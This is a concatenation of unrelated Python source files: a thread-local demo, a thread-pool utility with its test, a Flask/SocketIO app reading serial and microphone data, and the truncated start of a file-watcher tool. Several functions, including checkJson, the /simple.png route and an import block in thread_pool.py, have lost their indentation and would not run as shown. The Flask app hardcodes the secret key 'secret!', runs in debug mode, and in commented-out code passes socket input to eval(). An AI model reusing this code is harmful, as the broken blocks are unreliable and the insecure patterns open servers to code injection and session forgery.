    """Entry point used by regrtest: run both test classes."""
    test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
    # Allow running this test file directly.
    test_main()
|
myThreadLocal.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import threading
#print(dir(threading))
# Per-thread storage: each thread sees its own 'student' attribute.
thread_local = threading.local()


def process_student():
    """Print the student bound to the *calling* thread's local storage."""
    name = thread_local.student
    print('Hello,%s(in %s)' % (name, threading.current_thread().name))


def add_local(name):
    """Bind *name* to the calling thread, then report it."""
    thread_local.student = name
    process_student()


# Two threads write different names into the same `thread_local` object;
# each sees only its own value.
t1 = threading.Thread(target=add_local, args=('Winston',), name='Thread1')
t2 = threading.Thread(target=add_local, args=('gerald',), name='Thread2')
for worker in (t1, t2):
    worker.start()
for worker in (t1, t2):
    worker.join()
thread_pool.py | #!/usr/bin/env python
#coding:utf-8
"""
Author: --<v1ll4n>
Purpose: Provide some useful thread utils
Created: 2016/10/29
"""
import unittest
#import multiprocessing
from pprint import pprint
from time import sleep
try:
from Queue import Full, Empty, Queue
except:
from queue import Full, Empty, Queue
#from random import choice
#from traceback import format_exc
from threading import Thread, Lock
#from multiprocessing import Process, Lock
from uuid import uuid1
########################################################################
class TaskError(Exception):
    """Raised for failures while executing a pooled task."""
########################################################################
class LaborThread(Thread):
    """Worker thread owned by a Pool.

    Each labor pulls one task at a time from its private, size-1 task
    queue, runs it, and pushes a result record onto the result queue it
    shares with the master Pool.
    """

    # Shared by *all* labor threads.  The increment of the master's
    # ``_executed_task_count`` in run() is a read-modify-write on shared
    # state, so the guarding lock must itself be shared.  (Bug fix: each
    # instance previously created its own Lock, which synchronized
    # nothing and allowed lost updates to the counter.)
    _count_lock = Lock()

    def __init__(self, result_queue, master, clean_mod=True, *args, **kargs):
        """Constructor.

        result_queue: queue shared with the master Pool for result records.
        master: the owning Pool; its _executed_task_count is updated here.
        clean_mod: if True, strip result records down to state/result only.
        """
        Thread.__init__(self, name='ThreadPool-Labor-'+uuid1().hex,
                        *args, **kargs)
        self._master = master
        self._clean_mod = clean_mod
        self._result_queue = result_queue
        self._startworkingflag_ = True
        # Size 1: at most one task in flight per labor, so the dispatcher
        # can use full() to detect a busy labor.
        self._task_queue = Queue(1)

    def get_result_queue(self):
        """Return the shared result queue."""
        return self._result_queue

    def get_task_queue(self):
        """Return this labor's private task queue."""
        return self._task_queue

    def feed(self, function, *vargs, **kwargs):
        """Offer a task; return True if accepted, False if the labor is busy."""
        try:
            self._task_queue.put_nowait((function, vargs, kwargs))
            return True
        except Full:
            return False

    def run(self):
        """Main loop: execute queued tasks until stop() clears the flag."""
        while self._startworkingflag_:
            try:
                # The timeout lets the loop recheck the stop flag regularly.
                _task = self._task_queue.get(timeout=3)
            except Empty:
                continue
            result = {
                'from': self.name,
                'state': False,
                'result': None,
                'current_task': _task.__str__(),
                'exception': tuple(),
            }
            try:
                ret = self._process_task(_task)
                result['state'] = True
                result['result'] = ret
            except Exception as e:
                # Record the failure instead of killing the worker thread.
                result['state'] = False
                result['result'] = None
                result['exception'] = (str(type(e)), str(e))
            finally:
                if self._clean_mod:
                    # Clean mode: callers only get success flag + value.
                    result = {'state': result['state'],
                              'result': result['result']}
                self._result_queue.put(result)
                with self._count_lock:
                    self._master._executed_task_count = \
                        self._master._executed_task_count + 1

    def _process_task(self, task):
        """Run one (function, args, kwargs) triple and return its result."""
        return task[0](*task[1], **task[2])

    def stop(self):
        """Ask the labor to exit after its current task (non-blocking)."""
        self._startworkingflag_ = False

    def __del__(self):
        self.stop()

    def _exception_process(self):
        """Placeholder for custom exception handling (currently unused)."""
########################################################################
class Pool(object):
    """Simple thread pool: fed tasks are handed by a dispatcher daemon to
    LaborThread workers, and results accumulate on a shared queue."""

    def __init__(self, thread_max=30, clean_mod=True):
        """Constructor.

        thread_max: maximum number of labor threads kept alive.
        clean_mod: passed to each labor; trims result records to
            state/result only.
        """
        self.thread_max = thread_max
        self._current_thread = []
        self._daemon_thread = []
        self._clean_mod = clean_mod
        self._result_queue = Queue()
        self._task_queue = Queue()
        self.is_alive = True
        self._executed_task_count = 0   # incremented by labors as they finish
        self._task_count = 0            # incremented by feed()

    def _restart_thread_daemon(self):
        """Daemon loop: keep the labor population topped up to thread_max."""
        while self.is_alive:
            if len(self._current_thread) < self.thread_max:
                self._start_new_labor()
            else:
                sleep(0.5)

    def _start_new_labor(self):
        """Create, start and register one new labor thread."""
        labor = LaborThread(result_queue=self._result_queue, master=self,
                            clean_mod=self._clean_mod)
        labor.daemon = True
        labor.start()
        self._current_thread.append(labor)

    def feed(self, target_func, *vargs, **kwargs):
        """Queue one task for asynchronous execution."""
        self._task_queue.put((target_func, vargs, kwargs))
        self._task_count = self._task_count + 1

    def _dispatcher(self):
        """Daemon loop: hand each queued task to the first labor with room."""
        while self.is_alive:
            try:
                pending = self._task_queue.get()
                while True:
                    availible_threads = [None if x.get_task_queue().full()
                                         else x for x in self._current_thread]
                    for labor in availible_threads:
                        if labor is None:
                            continue
                        labor.feed(pending[0], *pending[1], **pending[2])
                        pending = None
                        break
                    if pending is None:
                        break
                    # else: every labor busy -- retry until one frees up
            except Empty:
                # Bug fix: time.sleep() accepts no 'seconds' keyword, so the
                # original sleep(seconds=0.5) raised TypeError.  (get() above
                # blocks, so this branch is normally unreachable, but it must
                # still be valid code.)
                sleep(0.5)

    def stop(self):
        """Signal every labor and both daemon loops to shut down."""
        for labor in self._current_thread:
            labor.stop()
        self.is_alive = False

    def start(self):
        """Start the labor-restarting and dispatching daemon threads."""
        self.is_alive = True
        restarter = Thread(name='restart_labor_daemon',
                           target=self._restart_thread_daemon)
        restarter.daemon = True
        restarter.start()
        self._daemon_thread.append(restarter)
        dispatcher = Thread(name='dispatcher_daemon', target=self._dispatcher)
        dispatcher.daemon = True
        dispatcher.start()
        self._daemon_thread.append(dispatcher)  # track it like the restarter

    def get_result_queue(self):
        """Return the queue that receives result records."""
        return self._result_queue

    def get_task_queue(self):
        """Return the queue of not-yet-dispatched tasks."""
        return self._task_queue

    def get_result_generator(self):
        """Yield result records until every fed task has been executed."""
        while True:
            try:
                yield self._result_queue.get(timeout=1)
            except Empty:
                if self._task_count == self._executed_task_count:
                    break

    @property
    def task_count(self):
        """The amount of tasks fed so far."""
        return self._task_count

    @property
    def executed_task_count(self):
        """The amount of tasks already executed."""
        return self._executed_task_count

    @property
    def percent(self):
        """Fraction of fed tasks already executed (0.0 before any feed())."""
        if self._task_count == 0:
            return 0.0  # bug fix: avoid ZeroDivisionError before any feed()
        return float(self._executed_task_count) / float(self._task_count)
########################################################################
class PoolTest(unittest.case.TestCase):
    """Smoke test for Pool: feed quick tasks, then drain the result queue."""

    def runTest(self):
        """Default entry point when the case is invoked directly.

        Bug fix: this used to call self.test_laborprocess(), a method that
        does not exist on this class (AttributeError); run the real test.
        The old docstring ("Constructor") was also wrong.
        """
        self.test_pool()

    def test_pool(self):
        """Feed 11 trivial tasks into a started Pool and drain all results."""
        def func1(arg1):
            print('func1 called!')
            return arg1

        pool = Pool()
        pool.start()
        pool.feed(func1, 12345)
        for i in range(10):
            pool.feed(func1, i)
        sleep(3)  # give the labors time to run everything
        # Drain results; stop once the queue stays empty for 5 seconds.
        while True:
            try:
                pprint(pool.get_result_queue().get(timeout=5))
            except Empty:
                break
        pool.stop()
if __name__ == "__main__":
    # Running this module directly executes PoolTest via unittest discovery.
    unittest.main()
|
main.py | from flask import Flask, render_template, session, request, make_response, json, jsonify, url_for
from flask_socketio import SocketIO, emit, join_room, leave_room,close_room, rooms, disconnect
import glob
# import json
import math
import numpy as np
import os
import pyaudio
from random import randint
from threading import Thread, Lock
import time
import serial
import sys
import struct
import logging
# Quiet Flask's built-in (werkzeug) per-request logging.
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)

# Pick the best available Flask-SocketIO async backend: prefer eventlet,
# then gevent, falling back to plain threading if neither is installed.
async_mode = None
if async_mode is None:
    try:
        import eventlet
        async_mode = 'eventlet'
    except ImportError:
        pass
if async_mode is None:
    try:
        from gevent import monkey
        async_mode = 'gevent'
    except ImportError:
        pass
if async_mode is None:
    async_mode = 'threading'
print('async_mode is ' + async_mode)
# monkey patching is necessary because this application uses a background
# thread
if async_mode == 'eventlet':
    import eventlet
    eventlet.monkey_patch()
elif async_mode == 'gevent':
    from gevent import monkey
    monkey.patch_all()
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #Version 2.7 or Above?
# if sys.version_info[0] >2:
# version3 = True
# kwargs = {'newline':''}
# else:
# version3 = False
# kwargs = {}
# serialConnected = False #global flag for whether or not the serial port should be connected
# serialPort = 0 # (init value is 3...junk) contains serial port object when in use...touching protected by serialLock below
# serialLock = Lock() #serial permission lock (protects shared resource of serial port)
# print (serialLock)
# #Taken from here on StackExchange: http://stackoverflow.com/questions/12090503/listing-available-com-ports-with-python
# #Want to give credit where credit is due!
# def serial_ports():
# if sys.platform.startswith('win'):
# ports = ['COM%s' % (i + 1) for i in list(range(256))]
# elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# # this excludes your current terminal "/dev/tty"
# ports = glob.glob('/dev/tty[A-Za-z]*')
# elif sys.platform.startswith('darwin'):
# ports = glob.glob('/dev/tty.*')
# else:
# raise EnvironmentError('Unsupported platform')
# result = []
# for port in ports:
# try:
# #print("checking port "+port)
# s = serial.Serial(port)
# #print("closing port "+port)
# s.close()
# result.append(port)
# except (OSError, serial.SerialException):
# pass
# return result
# #serial variables:
# serialselection = ''
# baudselection = 115200
# mcuMessage = []
# '''system_parameters (dictionary where keys are user-variable parameters and entry is list consisting of current value (index 0 and single-character comm term for conveying value back to micro...for example you could have system_parameters['K_d']=[1.4,'D']
# '''
# system_parameters = {}
# #params_and_values an ordered list of the names of paramters, headroom, and values to be plotted
# #Used in generating CSV header list in order
# params_and_values = []
# #A list pointing to parameter values for quick plotting (rather than list comprehend this every time
# param_vals = []
# command_terms = ['HIHI']
# #expected_length...how long each full message from Micro should be
# expected_length = 0
# #function that will be stored for chopping up message into appropriate signed/unsignedness/float, etc... makes this processing arbitrarily expandable as needed...must obviously agree with encoding scheme on micro
# parseFunction = lambda x: [0]
# '''Kp = 0.0
# Kd = 0.0
# Ki = 0.0
# direct = 0.0
# desired = 0.0
# '''
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##
#####################################
## ##
## Stuff from original files ##
## ##
#####################################
# keepRunning = True #set to True for default
# #global setup variables:
# #used during initialization of comms/building GUI
# isSetup = False
# setupString = ""
# allGoodFromGUI = False
# #Function run in parallel on infinite loop with
# #serves as serial listener outside of separate loop
# def serialThread():
# print ("Starting serial background thread.")
# global desired
# global serialLock
# global csvLock
# global serialPort
# global system_parameters
# global params_and_values
# global expected_length
# global parseFunction
# global param_vals
# global csv_default
# global csv_recent
# global alt_data
# global alternate
# global isSetup
# global setupString
# global command_terms
# while True:
# #print (serialConnected)
# if serialConnected:
# print("serial connected!")
# print("not setup")
# writeUpdates('~',0)
# time.sleep(2.0)
# serialLock.acquire()
# try:
# new_setupString = serialPort.readline()
# serialPort.flushInput()
# except:
# print ("initi string reading issue")
# serialLock.release()
# print("before")
# print(new_setupString)
# # what the heck is happening here?
# new_setupString = strip_until_marker(new_setupString)
# print("after")
# print(new_setupString)
# temp_commands = new_setupString.split('&')
# temp_commands = temp_commands[1:-1]
# print(temp_commands)
# print(command_terms)
# if temp_commands != command_terms: #only reload the gui if the configuration setup string has changed!
# command_terms = temp_commands
# print("DETECTED DIFFERENT STARTUP STRING!")
# setupString = new_setupString
# print(setupString)
# temp = setupString.split('&',1)[1]
# temp = temp.rsplit('&',1)[0]
# setupString = temp
# print(setupString)
# try:#send up to javascript to sort its part out
# socketio.emit('startup',setupString,broadcast =True)
# except:
# print ("failed socket")
# #build structures based on setupString's contents and orderj
# plot_count =0 #used for tallying plots
# spaces = [] #used for determining how to chop data string (bytes per var)
# s=[] #list of sliders
# t=[] #list of temporal plots
# h = [] #contains headroom value if that is being plotted
# for x in command_terms:
# if len(x)>0 and x[0] =='S': #is a slider
# print("slider")
# slider_vals = x.split('~') #chop string
# print(slider_vals)
# #next: add key to system_parameters dict of slider name
# #entry is starting val (0) and one char value used for comms
# system_parameters[slider_vals[1]]=[0,slider_vals[2]]
# s.append(slider_vals[1]) #add name of param to s list
# #next is to fill in the param_vals list with the current value
# param_vals.append(system_parameters[slider_vals[1]][0])
# if len(x)>0 and x[0] == 'A': #we are alternating
# vals = x.split('~') #split substring
# alt_data['period'] = float(vals[2]) #period unpacked
# alt_data['param'] = vals[1] #link alternate to selected parameter
# if len(x)>0 and x[0]=='T': #we have a temporal plot
# print("Plot")
# plot_vals = x.split('~') #split substring
# t.append(plot_vals[1]) #add name to t list
# #next line: append list: [num_bytes,signed/unsigned/float,etc..]
# print(plot_vals)
# spaces.append([int(plot_vals[2][1]),plot_vals[2][0]])
# plot_count +=1 #increment plot count
# if len(x)>0 and x[0]=='H':
# head_vals = x.split('~')
# h.append("Headroom")
# plot_count +=1 #headroom isn't a "plot" but treated same
# if head_vals[1] =='2':
# spaces.append([2,'S']) #needed since 16bit int on Arduino
# elif head_vals[1] =='4':
# spaces.append([4,'F']) #needed since ARM32 Teensy
# params_and_values = t+h+s #in order plots, headroom, sliders
# print("Identified values: %r" %(params_and_values))
# expected_length = sum(x[0] for x in spaces)+2 #2 from open/closing byte
# #parse_prototype is function that will chop up incoming bytes for sending up to the GUI
# def parse_prototype(listo):
# new_out = []
# current_index=1 #start 1 up because of start byte
# #print(listo)
# for x in range(plot_count):
# val = 0
# if spaces[x][0] == 1:
# if spaces[x][1] == 'S':
# val = struct.unpack('b',listo[current_index:current_index+1])[0]
# elif spaces[x][1] =='U':
# val = struct.unpack('B',listo[current_index:current_index+1])[0]
# elif spaces[x][0] == 2:
# if spaces[x][1] == 'S':
# val = struct.unpack('<h',listo[current_index:current_index+2])[0]
# elif spaces[x][1] == 'U':
# val = struct.unpack('H',listo[current_index:current_index+2])[0]
# elif spaces[x][0] == 4:
# if spaces[x][1] == 'F':
# val = struct.unpack('f',listo[current_index:current_index+4])[0]
# elif spaces[x][1] == 'S':
# val = struct.unpack('i',listo[current_index:current_index+4])[0]
# new_out.append(val)
# current_index += spaces[x][0]
# return new_out
# parseFunction = parse_prototype
# while not allGoodFromGUI:
# print("Waiting for GUI Setup...")
# time.sleep(1.0)
# isSetup = True
# else:
# print("SAME AS BEFORE!")
# inform_dev() #just tell device that we are good
# serialLock.acquire()
# try:
# serialPort.flushInput()
# except:
# print ("initi string reading issue")
# serialLock.release()
# print("updating Parameters:")
# for x in s: #reload gui and device
# socketio.emit('setup slider',{0:x,1:str(system_parameters[x][0])}, broadcast=True)
# print("Writing %s to be %0.4f" %(system_parameters[x][1],system_parameters[x][0]))
# writeUpdates(system_parameters[x][1],system_parameters[x][0])
# time.sleep(0.1)
# writeUpdates(system_parameters[x][1],system_parameters[x][0])
# time.sleep(0.1)
# time.sleep(1)
# print(system_parameters)
# print ("Starting to read serial subthread")
# print ('Alternating state')
# print (alternate)
# print("expected length:")
# print (expected_length)
# print (serialConnected)
# while serialConnected:
# serialLock.acquire()
# b = serialPort.read(expected_length)
# if len(b) != expected_length:
# print("expected=%d, actual=%d\n",len(b),expected_length)
# new_data = None
# if len(b) > 0 and messageRead(b,expected_length):
# new_data = parseFunction(b)
# if new_data != None:
# try:
# socketio.emit('note',new_data,broadcast =True)
# except:
# print ("failed socket")
# if csv_yn:
# temp_time = [time.time()-csv_st] #time since recording started
# csvLock.acquire()
# newb_list = temp_time+new_data+[system_parameters[x][0] for x in s]
# csv_default.writerow(newb_list)
# csv_recent.writerow(newb_list)
# csvLock.release()
# serialLock.release()
# time.sleep(0.01)
# if alternate == 1:
# if time.time()-alt_data['timer'] > alt_data['period']:
# print ('Switch to :')
# alt_data['timer'] = time.time() #reset timer
# poi = alt_data['param'] #param of interest
# print(type(system_parameters[poi][0]))
# print(system_parameters[poi][0])
# system_parameters[poi][0] = system_parameters[poi][0]*-1.0
# alt_data['state'] = alt_data.get('state')*-1
# writeUpdates(system_parameters[poi][1],system_parameters[poi][0])
# try:
# socketio.emit('state toggle', system_parameters[poi][0], broadcast=True) #tell the GUI that the desired has changed
# except:
# print('failed toggle socket')
# print ("Stopping serial read. Returning to idle state")
# time.sleep(0.01)
# def strip_until_marker(input_string):
# #return only text after last non-ascii character has been found
# #should *always* work...closing byte of plot package is \xff which is non-ascii and
# #should get caught in this scheme...there are of course ways to break this but they
# #require breaking the communication contract we have setup.
# new_string = ''
# for x in range(len(input_string)):
# poss = input_string[x:x+1]
# try:
# if version3:
# if type(poss)==type("hi"):
# poss = str.encode(poss,'ascii') #fail here possibly
# char = poss.decode('ascii')
# new_string+=char
# except:
# new_string=""
# return new_string
# #runtime variables...
# def messageRead(buff,exp):
# first = struct.unpack('b',buff[0:1])[0]
# last = struct.unpack('b',buff[exp-1:exp])[0]
# if first == 0 and last == -1:
# return True
# else:
# return False
# # User has connected
# @socketio.on('connect')
# def test_connect():
# print ('hey someone connected!' )
# ports = serial_ports() #generate list of currently connected serial ports
# print (ports)
# newb=[]
# for p in ports:
# newb.append({"comName": p})
# print (json.dumps(newb))
# #emit('serial list display', {'data': ports}) #emit socket with serial ports in it
# emit('serial list display', newb) #emit socket with serial ports in it
# #emit('my response', {'data': 'Connected'})
# # User has disconnected
# @socketio.on('disconnect')
# def test_disconnect():
# global csv_yn
# global csvLock
# emit('serial disconnect request',broadcast=True)
# csv_yn = 0
# #if current is not None and archive is not None:
# csvLock.acquire()
# try:
# current.close()
# archive.close()
# except NameError:
# pass #if didn't exist yet, don't try...
# csvLock.release()
# print('Client disconnected. Hopefully that was for the best.')
# writeUpdates('~',0)#for non-autoreset devices must tell it to enter child state again
# # Something
# def writeUpdates(tag,val):
# global serialPort
# global serialLock
# string_to_write = tag+' %0.2f\n' %(float(val))
# print(string_to_write)
# if serialConnected:
# serialLock.acquire() #claim serial resource
# if version3:
# b = bytes(string_to_write,'UTF-8')
# print(b)
# serialPort.write(bytes(string_to_write,'UTF-8'))
# else:
# serialPort.write(string_to_write.encode('utf-8'))
# #serialPort.write(string_to_write)
# serialLock.release() #release serial resource back out into big scary world
# else:
# print ("Change in %s to value %s not written since no live serial comm exists yet" %(tag,val))
# # Specs
# @socketio.on('serial select')
# def action(port):
# global serialselection
# print ('serial port changed to %s' %(port))
# serialselection = port
# @socketio.on('baud select')
# def action(baud):
# global baudselection
# print ('baud changed to %s' %(baud))
# baudselection = baud
# @socketio.on('serial connect request')
# def connection(already_built):
# global serialConnected
# global serialPort
# global serialLock
# global alternate
# global isSetup
# already_built = eval(str(already_built))
# print("state of gui")
# print(already_built)
# isSetup = already_built['state'] #user this
# print(isSetup)
# alternate = 0
# print ('Trying to connect to: ' + serialselection + ' ' + str(baudselection))
# print (serialLock)
# print (serialConnected)
# try:
# serialLock.acquire()
# print ("Lock acquired")
# serialPort = serial.Serial(serialselection, int(baudselection),timeout=4)
# print ('SerialPort')
# print ('Connected to ' + str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
# emit('serial connected', broadcast=True) #tells page to indicate connection (in button)
# serialPort.flushInput()
# serialLock.release()
# serialConnected = True #set global flag
# except:
# print ("Failed to connect with "+str(serialselection) + ' at ' + str(baudselection) + ' BAUD.')
# @socketio.on('serial disconnect request')
# def discon():
# global serialConnected
# global serialLock
# global serialPort
# print ('Trying to disconnect...')
# serialLock.acquire()
# serialPort.close()
# serialLock.release()
# serialConnected = False
# emit('serial disconnected',broadcast=True)
# print ('Disconnected...good riddance' )
# @socketio.on('disconnected')
# def ending_it():
# print ("We're done, we're through, we're over.")
# @socketio.on('change')
# def action(data):
# global system_parameters
# data = eval(str(data))
# system_parameters[data['id']][0]=float(data['val'])
# writeUpdates(system_parameters[data['id']][1],system_parameters[data['id']][0])
# @socketio.on('all set from gui')
# def action():
# global allGoodFromGUI
# allGoodFromGUI = True
# print("we are done from GUI Side")
# inform_dev()
# def inform_dev():
# global serialPort
# global serialLock
# string_to_write = "SET\n"
# if serialConnected:
# serialLock.acquire() #claim serial resource
# if version3:
# serialPort.write(bytes(string_to_write,'UTF-8'))
# else:
# print(string_to_write)
# serialPort.write(string_to_write)
# serialPort.flushInput()
# serialLock.release() #release serial resource back out into big scary world
# else:
# print ("can't inform device since it isn't connected...what does this even mean") # same joe...
##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
########################
## ##
## SERVER STUFF ##
## ##
########################
#Start up Flask server:
app = Flask(__name__, template_folder = './',static_url_path='/static')
app.config['SECRET_KEY'] = 'secret!' #shhh don't tell anyone. Is a secret
socketio = SocketIO(app, async_mode = async_mode)
thread = None
global identifiers
def dataThread():
    """Background-thread placeholder; currently only logs that it ran.

    BUG FIX: the original printed ``"yes)"`` — a stray closing parenthesis
    typed inside the string literal; the intended message is ``"yes"``.
    """
    print("yes")
# Startup has occured
@app.route('/')
def index():
    """Serve the main page; lazily start the background data thread once."""
    global thread
    global fft
    global data
    print ("A user connected")
    # Spawn the worker only on the first request; `thread` stays set after.
    if thread is None:
        thread = Thread(target=dataThread)
        thread.daemon = True
        thread.start()
    # NOTE: leaving the mic FFT thread disabled for now.
    # fft = Thread(target=micThread)
    # fft.daemon = True
    # fft.start()
    return render_template('pages/main.html')
# Return the configuration
@app.route('/config', methods=['GET', 'POST'])
def config():
    """Serve the JSON configuration file.

    GET  -- refresh/validate identifiers via checkJson() and return the
            parsed config as JSON.
    POST -- not implemented yet; answered with an explicit 405 message.
    """
    if request.method == 'GET':
        SITE_ROOT = os.path.realpath(os.path.dirname(__file__))
        json_url = os.path.join(SITE_ROOT, "static/json/", "config.json")
        # Ensure every module entry carries a unique identifier first.
        checkJson(json_url)
        # BUG FIX: close the file handle (the original leaked it via
        # json.load(open(...))).
        with open(json_url) as f:
            config = json.load(f)
        return jsonify(config)
    # BUG FIX: the original fell through with no return value for POST,
    # which makes Flask raise a 500; reply with an explicit 405 instead.
    print("can't really post anything yet, sorry...")
    return "POST not supported yet", 405
# print(identifiers['ToneGenerator'])
# Check and update identifiers in the json. plus other things
def checkJson(json_url):
# Make global dictionary of ID's
global identifiers
identifiers = {}
# Open Json
with open(json_url, "r") as jsonFile:
config = json.load(jsonFile)
# Function to generate new unique identifier
def newUnique(n):
range_start = 10**(n-1)
range_end = (10**n)-1
return randint(range_start, range_end)
# List to store existing unique values
uniques = []
# Open up modules portion of config.json
modules = config[1]['modules']
for module in modules:
for instance in module:
for item in module[instance]:
# Check if module already has unique identifer
if 'unique' in item:
# Appends existing identifier to uniques
uniques.append(item['unique'])
else:
# Generates new unique identifier
unique = newUnique(3)
# Checks if identifier hasn't already been used
if unique not in uniques:
# Assings identifier for that module
item['unique'] = unique
identifiers[item['name']] = item['unique']
# Write modified json file
with open(json_url, "w") as jsonFile:
# Complicated dump so that everytime we modify the json it isn't minified
json.dump(config, jsonFile, sort_keys=True,indent=2,separators=(',',': '))
# Arbitrary for the time being, but this will lead to the generation page
@app.route('/generate')
def configGenerate():
    """Serve the config-generation page."""
    # NOTE(review): `identifiers` is declared global but never used here —
    # presumably reserved for a future version of this page; confirm.
    global identifiers
    return render_template('pages/index.html')
# Universal announcer
@socketio.on('reporting')
def announce(content):
    """Relay a module's report to every listener on its announce channel."""
    # Pull the routing key out first; the payload tuple mirrors the input.
    module_id = content['unique']
    payload = (module_id, content['div'], content['data'])
    socketio.emit("announce_{}".format(module_id), data=payload)
@app.route("/simple.png")
def simple():
import datetime
import io
import random
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib.dates import DateFormatter
try:
while True:
fig=Figure()
ax=fig.add_subplot(111)
x=[]
y=[]
now=datetime.datetime.now()
delta=datetime.timedelta(days=1)
for i in range(10):
x.append(now)
now+=delta
y.append(random.randint(0, 1000))
ax.plot_date(x, y, '-')
ax.xaxis.set_major_formatter(DateFormatter('%Y-%m-%d'))
fig.autofmt_xdate()
canvas=FigureCanvas(fig)
png_output = io.BytesIO()
canvas.print_png(png_output)
response=make_response(png_output.getvalue())
response.headers['Content-Type'] = 'image/png'
return response
time.sleep(.001)
fig.cla()
except:
print('welp')
def micThread():
    """Continuously push microphone FFT frames to connected clients."""
    # The analyzer is constructed exactly once (the original guarded this
    # with an always-true `first_time` flag).
    analyzer = SpectrumAnalyzer()
    # Etc
    unique = 450
    burst_duration = 1
    toggle_count = 500
    on_state = True
    name = 'joe'
    tick = 0
    while True:
        tick += 1
        if tick % burst_duration == 0:
            socketio.emit('update_{}'.format(unique), analyzer.fft())
        if tick % toggle_count == 0:
            tick = 0
            print("OFF" if on_state else "ON")
            on_state = not on_state
        time.sleep(0.001)
class SpectrumAnalyzer:
    """Capture microphone audio via PyAudio and expose an FFT per chunk."""
    # Probe the default host API / device once at class-definition time.
    p = pyaudio.PyAudio()
    device = p.get_device_info_by_host_api_device_index(0, 0)
    # Device Specs
    CHUNK = 1024                               # samples per read
    CHANNELS = int(device['maxInputChannels'])
    FORMAT = pyaudio.paFloat32
    RATE = int(device['defaultSampleRate'])
    START = 0                                  # first sample of the FFT window
    N = CHUNK                                  # FFT window length
    wave_x = 0
    wave_y = 0
    spec_x = 0
    spec_y = 0
    data = []
    def __init__(self):
        """Open a float32 input stream on input device 0."""
        self.pa = pyaudio.PyAudio()
        self.stream = self.pa.open(
            format = self.FORMAT,
            channels = self.CHANNELS,
            rate = self.RATE,
            input = True,
            output = False,
            input_device_index = 0,
            frames_per_buffer = self.CHUNK)
    def audioinput(self):
        """Read one CHUNK of samples and return it as a float32 ndarray."""
        # BUG FIX: np.fromstring is deprecated for binary input (and removed
        # in recent NumPy releases); np.frombuffer is the supported
        # equivalent for decoding the raw stream bytes.
        data = np.frombuffer(self.stream.read(self.CHUNK), dtype=np.float32)
        return data
    def fft(self):
        """Capture one chunk; return its magnitude spectrum (list of floats)."""
        self.data = self.audioinput()
        self.wave_x = range(self.START, self.START + self.N)
        self.wave_y = self.data[self.START:self.START + self.N]
        self.spec_x = np.fft.fftfreq(self.N, d = 1.0 / self.RATE)
        y = np.fft.fft(self.data[self.START:self.START + self.N])
        self.spec_y = [np.sqrt(c.real ** 2 + c.imag ** 2) for c in y]
        return self.spec_y
if __name__ == '__main__' or __name__ == 'server':
socketio.run(app, port=3000, debug=True) |
js_env.py | import re
import os
import shlex
import subprocess
import datetime
import configparser
import argparse
from glob import glob
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from flask import Flask
from threading import Thread
def which(program):
    """Locate *program* on disk, mimicking the Unix ``which`` command.

    If *program* contains a path component it is checked directly;
    otherwise every directory on ``$PATH`` is searched. Returns the full
    path of the first executable match, or ``None``.

    This function is taken from
    http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
    """
    def is_exe(candidate):
        return os.path.isfile(candidate) and os.access(candidate, os.X_OK)

    directory, _ = os.path.split(program)
    if directory:
        return program if is_exe(program) else None
    for entry in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(entry.strip('"'), program)
        if is_exe(candidate):
            return candidate
    return None
class Singleton:
    """Non-thread-safe singleton helper, applied as a *decorator*.

    Decorate a class with ``@Singleton``; obtain the single shared instance
    via ``Instance()``. Calling the decorated name directly raises
    ``TypeError``. The decorated class may define one ``__init__`` taking
    only ``self``. Limitation: the decorated class cannot be inherited from.

    This singleton class is taken from
    http://stackoverflow.com/questions/42558/python-and-the-singleton-pattern
    """

    def __init__(self, decorated):
        self._decorated = decorated

    def Instance(self):
        """Create the instance on first use, then keep returning it."""
        if not hasattr(self, "_instance"):
            self._instance = self._decorated()
        return self._instance

    def __call__(self):
        raise TypeError('Singletons must be accessed through `Instance()`.')

    def __instancecheck__(self, inst):
        # Make isinstance(obj, DecoratedName) work on the wrapper.
        return isinstance(inst, self._decorated)
class Configuration:
    """Project configuration backed by the ``.js_env_config`` INI file.

    Exposes the configured npm commands and server port, plus the
    include/exclude rules that decide which files are watched.
    """

    def __init__(self):
        self._conf = configparser.ConfigParser()
        self._conf.optionxform = str
        self._conf.read('.js_env_config')
        self._excluded_regex = []
        self._excluded_extensions = []
        self._included_extensions = []
        self._excluded_files = []
        self._excluded_folders = ["node_modules"]
        self._commands = ["build", "serve", "start", "test"]
        # The config file must define a server section and every command.
        assert "commands" in self._conf
        assert "server" in self._conf
        assert all([c in self._conf["commands"] for c in self._commands])

    @property
    def server_port(self):
        return self._conf["server"]["port"]

    @property
    def build_command(self):
        return self._conf["commands"]["build"]

    @property
    def test_command(self):
        return self._conf["commands"]["test"]

    @property
    def run_command(self):
        return self._conf["commands"]["run"]

    @property
    def start_command(self):
        return self._conf["commands"]["start"]

    @property
    def serve_command(self):
        return self._conf["commands"]["serve"]

    def set_included_extensions(self, included_file_extensions):
        self._included_extensions = included_file_extensions

    def set_excluded_extensions(self, excluded_file_extensions):
        self._excluded_extensions = excluded_file_extensions

    def set_excluded_regex(self, excluded_filters):
        self._excluded_regex = excluded_filters

    def set_excluded_files(self, excluded_files):
        self._excluded_files = excluded_files

    def set_excluded_folders(self, excluded_folders):
        self._excluded_folders = excluded_folders

    # is_watched requires full relative filepath
    def is_watched(self, filepath):
        """Return True when *filepath* matches an included extension and no
        exclusion rule (extension, folder, file name, or regex) vetoes it."""
        included = any(filepath.endswith(ext) for ext in self._included_extensions)
        vetoed = (
